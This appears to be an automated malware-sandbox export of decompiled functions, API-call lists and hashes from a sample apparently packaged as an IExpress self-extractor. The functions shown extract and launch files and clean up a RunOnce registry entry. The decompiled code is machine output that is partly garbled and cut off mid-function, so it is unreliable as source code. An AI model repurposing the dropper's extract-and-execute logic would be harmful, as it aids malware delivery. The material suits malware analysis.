Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
Instruction ID: a8febf2f5709e3f9c0e8a330b2bdf3bd453087c2500338c011d24689b58f7139
Opcode Fuzzy Hash: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
Instruction Fuzzy Hash: D3118F35A02328FB9B309B969C09DFFBEBCEF057A1F504095F989A2004D6314A44D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 010D6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E010D7155();
				_push(0x58);
				_push(0x10d72b8);
				E010D7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10d88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10d88b0; // 0x2
						if(__eflags != 0) {
							 *0x10d81e4 = _t58;
							goto L13;
						} else {
							 *0x10d88b0 = _t58;
							_t37 = E010D6C3F(0x10d10b8, 0x10d10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L010D6FF4();
						L13:
						_t68 =  *0x10d88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x10d10b4);
							_push(0x10d10ac);
							L010D7202();
							 *0x10d88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x10d88ac = 0;
						}
						_t71 =  *0x10d88b4;
						if( *0x10d88b4 != 0 && E010D7060(_t71, 0x10d88b4) != 0) {
							_t60 =  *0x10d88b4; // 0x0
							 *0x10da288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E010D2BFB(0x10d0000, 0, _t59); // executed
							 *0x10d81e0 = _t30;
							__eflags =  *0x10d81f8;
							if( *0x10d81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x10d81e4;
							if( *0x10d81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x10d81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E010D724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x010d6a60
0x010d6a6a
0x010d6a6c
0x010d6a71
0x010d6a78
0x010d6a7f
0x010d6a85
0x010d6a8e
0x010d6a91
0x010d6a93
0x010d6a9c
0x010d6aa2
0x00000000
0x00000000
0x010d6aa6
0x010d6ab4
0x00000000
0x010d6aa8
0x010d6aaa
0x010d6aab
0x010d6aab
0x010d6abf
0x010d6abf
0x010d6ac5
0x010d6ad1
0x010d6ad7
0x010d6b05
0x00000000
0x010d6ad9
0x010d6ad9
0x010d6ae9
0x010d6af0
0x010d6af2
0x00000000
0x010d6af4
0x010d6af4
0x010d6afb
0x010d6afb
0x010d6af2
0x010d6ac7
0x010d6ac7
0x010d6ac9
0x010d6b0b
0x010d6b0b
0x010d6b11
0x010d6b13
0x010d6b18
0x010d6b1d
0x010d6b24
0x010d6b24
0x010d6b30
0x010d6b39
0x010d6b39
0x010d6b3b
0x010d6b42
0x010d6b57
0x010d6b5f
0x010d6b65
0x010d6b65
0x010d6b67
0x010d6b6c
0x010d6b6e
0x010d6b71
0x010d6b74
0x010d6b74
0x010d6b79
0x00000000
0x00000000
0x010d6b7d
0x010d6b81
0x00000000
0x00000000
0x010d6b83
0x010d6b8c
0x010d6b8d
0x010d6b90
0x010d6b90
0x010d6b83
0x010d6b81
0x010d6b94
0x010d6b98
0x010d6ba2
0x010d6b9a
0x010d6b9a
0x010d6b9a
0x010d6ba3
0x010d6bab
0x010d6bb0
0x010d6bb5
0x010d6bbc
0x010d6bbf
0x00000000
0x010d6bbf
0x010d6c1e
0x010d6c25
0x010d6c27
0x010d6c2d
0x010d6c2d
0x010d6c32
0x00000000
0x010d6bc5
0x010d6bc5
0x010d6bc8
0x010d6bcc
0x010d6bce
0x010d6bce
0x010d6bd1
0x010d6bd3
0x010d6bd3
0x010d6bd6
0x010d6bda
0x010d6be1
0x010d6be3
0x010d6be5
0x010d6be5
0x010d6be6
0x010d6be6
0x010d6be9
0x010d6bea
0x010d6bea
0x010d6b74
0x010d6c39
0x010d6c3e
0x010d6c3e
0x010d6abe
0x010d6abe
0x00000000

APIs

Part of subcall function 010D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
Part of subcall function 010D7155: GetCurrentProcessId.KERNEL32 ref: 010D7191
Part of subcall function 010D7155: GetCurrentThreadId.KERNEL32 ref: 010D719A
Part of subcall function 010D7155: GetTickCount.KERNEL32 ref: 010D71A3
Part of subcall function 010D7155: QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8

GetStartupInfoW.KERNEL32(?,010D72B8,00000058), ref: 010D6A7F
Sleep.KERNEL32(000003E8), ref: 010D6AB4
_amsg_exit.MSVCRT ref: 010D6AC9
_initterm.MSVCRT ref: 010D6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 010D6B49
exit.KERNELBASE ref: 010D6BBF
_ismbblead.MSVCRT ref: 010D6BDA

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
Instruction ID: 94a7c3e117df251ae79181f822699ba4243ca818ce81eb36c296a51779a9a2d9
Opcode Fuzzy Hash: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
Instruction Fuzzy Hash: 6A41EF35A45365DBEB729B6DE8057BE7BE4FB44720F14805BEDC197284CB7A4880CB80

Uniqueness

Uniqueness Score: -1.00%

Function 010D58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010D58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E010D1680(_t20, _t36, _t33);
					E010D658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x10d9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x10d9124 = E010D6285();
					_t14 = 0;
				}
				return _t14;
			}

0x010d58cd
0x010d58d1
0x010d58d3
0x010d58d5
0x010d58d8
0x010d58d8
0x010d58da
0x010d58db
0x010d58e1
0x010d58ed
0x010d58f1
0x010d591e
0x010d592c
0x010d5943
0x010d594a
0x010d594d
0x010d5953
0x010d5959
0x00000000
0x010d595b
0x010d595c
0x010d5963
0x010d596c
0x00000000
0x010d5972
0x010d5974
0x010d597a
0x010d597a
0x010d596c
0x010d58f3
0x010d5901
0x010d5906
0x010d590b
0x010d5910
0x010d5910
0x010d5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010D5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010D5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5943
LocalFree.KERNEL32(00000000,?,010D5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D594D
CloseHandle.KERNEL32(00000000,?,010D5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010D5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5963

Strings

TMP4351$.TMP, xrefs: 010D5923
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D58CD, 010D58CF, 010D5919, 010D5962

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
API String ID: 747627703-3705647674
Opcode ID: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
Instruction ID: 2e8ec024b2f81bcc9e39ebafced0b9f4261f17996df3a835a5bbb4d3ec8278f2
Opcode Fuzzy Hash: 0036fcb8c811dced1aa4640e3ac358996f8f8bbfa2e54a89d65aa8bc2f120182
Instruction Fuzzy Hash: 561138317013216BD7301E7D9C0DA9BBFADDF46260B004659F9C5D31C4CE75980583A0

Uniqueness

Uniqueness Score: -1.00%

Function 010D3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E010D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x10d8004; // 0x261cebeb
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E010D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x10d9124 = E010D6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E010D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x10d8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x10d9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x10d9a2c = _t44;
						}
					}
				}
				E010D411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x10d9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x010d3fef
0x010d3ffa
0x010d4001
0x010d4008
0x010d400a
0x010d400b
0x010d4010
0x010d410a
0x010d411a
0x010d411a
0x010d401c
0x010d401d
0x010d401e
0x010d401f
0x010d4033
0x010d403b
0x010d40ca
0x010d40e9
0x010d40f8
0x010d4101
0x010d4106
0x010d4106
0x010d4108
0x010d4108
0x00000000
0x010d4108
0x010d4049
0x010d405c
0x010d4062
0x010d4068
0x010d406e
0x010d4070
0x010d4077
0x010d407f
0x010d4089
0x010d408b
0x010d408b
0x010d4089
0x010d4077
0x010d4091
0x010d409c
0x010d40a8
0x010d40b8
0x00000000
0x010d40c2
0x00000000
0x010d40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010D4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 010D4049
GetExitCodeProcess.KERNELBASE ref: 010D405C
CloseHandle.KERNEL32(?), ref: 010D409C
CloseHandle.KERNEL32(?), ref: 010D40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D40E9

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
Instruction ID: 74f910aa1002154ade6312213230306f09f494e261e2144b5384ce0c4e1cb9e5
Opcode Fuzzy Hash: 54f134a69a6fe14670978b3cf2ce4aec2f92b61e36ee048346cf19e0cee113e0
Instruction Fuzzy Hash: 1231B135742318ABEB709B79DC48FAB7BB8EB94700F1001A9F985D2551C6364881CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010D51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E010D51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E010D468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E010D468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E010D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x10d9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x10d9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x10d9124 = 0x80070714;
					goto L10;
				}
				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10d9124 = E010D6285();
				goto L10;
			}

0x010d51fb
0x010d5207
0x010d520b
0x010d523c
0x010d5268
0x010d5270
0x010d528b
0x010d5293
0x010d529c
0x010d52a6
0x010d52b0
0x00000000
0x010d52b0
0x010d529e
0x010d5279
0x00000000
0x010d527b
0x010d5273
0x00000000
0x010d5273
0x010d524a
0x010d5250
0x010d5256
0x00000000
0x010d5256
0x010d5219
0x010d5223
0x00000000

APIs

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5250

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285

Strings

<None>, xrefs: 010D5262
UPROMPT, xrefs: 010D51EF, 010D5230

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
Instruction ID: 9dc075ffa85ff16943a10f021ac7e458c679cc46459b8cf2e1e6a8eca8bcb0d3
Opcode Fuzzy Hash: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
Instruction Fuzzy Hash: 1911C8B5702301ABD3656BB59C45F7B65EDEBCA394B00442DFEC2D6584DE7E8C014228

Uniqueness

Uniqueness Score: -1.00%

Function 010D52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E010D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x10d8004; // 0x261cebeb
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x10d91e0; // 0xf78ed8
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x10d8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
					_push(_t22);
					E010D1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					if(( *0x10d9a34 & 0x00000020) != 0) {
						E010D65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E010D2390( &_v268);
					_t11 =  *0x10d8a20; // 0x0
				}
				if( *0x10d9a40 != 1 && _t11 != 0) {
					_t11 = E010D1FE1(_t22); // executed
				}
				 *0x10d8a20 =  *0x10d8a20 & 0x00000000;
				return E010D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x010d52b6
0x010d52b6
0x010d52b6
0x010d52c1
0x010d52c8
0x010d52cb
0x010d52cc
0x010d52d4
0x010d52d6
0x010d52d7
0x010d52de
0x010d52e0
0x010d52f2
0x010d52fa
0x010d52fa
0x010d5302
0x010d5305
0x010d530c
0x010d5312
0x010d5316
0x010d5316
0x010d5317
0x010d531c
0x010d531f
0x010d5333
0x010d5345
0x010d5351
0x010d5359
0x010d5359
0x010d5363
0x010d5369
0x010d536f
0x010d5374
0x010d5374
0x010d5381
0x010d5387
0x010d5387
0x010d538f
0x010d53a0

APIs

SetFileAttributesA.KERNELBASE(00F78ED8,00000080,?,00000000), ref: 010D52F2
DeleteFileA.KERNELBASE(00F78ED8), ref: 010D52FA
LocalFree.KERNEL32(00F78ED8,?,00000000), ref: 010D5305
LocalFree.KERNEL32(00F78ED8), ref: 010D530C
SetCurrentDirectoryA.KERNELBASE(010D11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D5363

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D5334

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 2833751637-256195474
Opcode ID: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
Instruction ID: 3d297d03583c70ccbe2e03df99f2271f6fd25f6a6fb8ccb19ffd4b185023174f
Opcode Fuzzy Hash: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
Instruction Fuzzy Hash: 1621A131502315DBEB719B2CEC08BA97BF0BB14714F04819AFDC257198CFBA5984CB81

Uniqueness

Uniqueness Score: -1.00%

Function 010D1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x10d8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x010d1fee
0x010d2005
0x010d200d
0x010d2017
0x00000000
0x010d2020
0x010d200d
0x010d2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010D538C,?,?,010D538C), ref: 010D2005
RegDeleteValueA.KERNELBASE(010D538C,wextract_cleanup3,?,?,010D538C), ref: 010D2017
RegCloseKey.ADVAPI32(010D538C,?,?,010D538C), ref: 010D2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010D1FFB
wextract_cleanup3, xrefs: 010D1FE7, 010D200F

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
API String ID: 849931509-2968168367
Opcode ID: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
Instruction ID: b383128f3b5df4afc10fcca19cf3e39e25707b06240a20ecd6d6cf88b70c1869
Opcode Fuzzy Hash: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
Instruction Fuzzy Hash: 18E04F30651318FBEB318A91EC0EF597F6AEB00780F104299FE84A1059E7665A10D708

Uniqueness

Uniqueness Score: -1.00%

Function 010D4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010D4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x10d8004; // 0x261cebeb
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10d91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E010D4E99(_t75);
						L35:
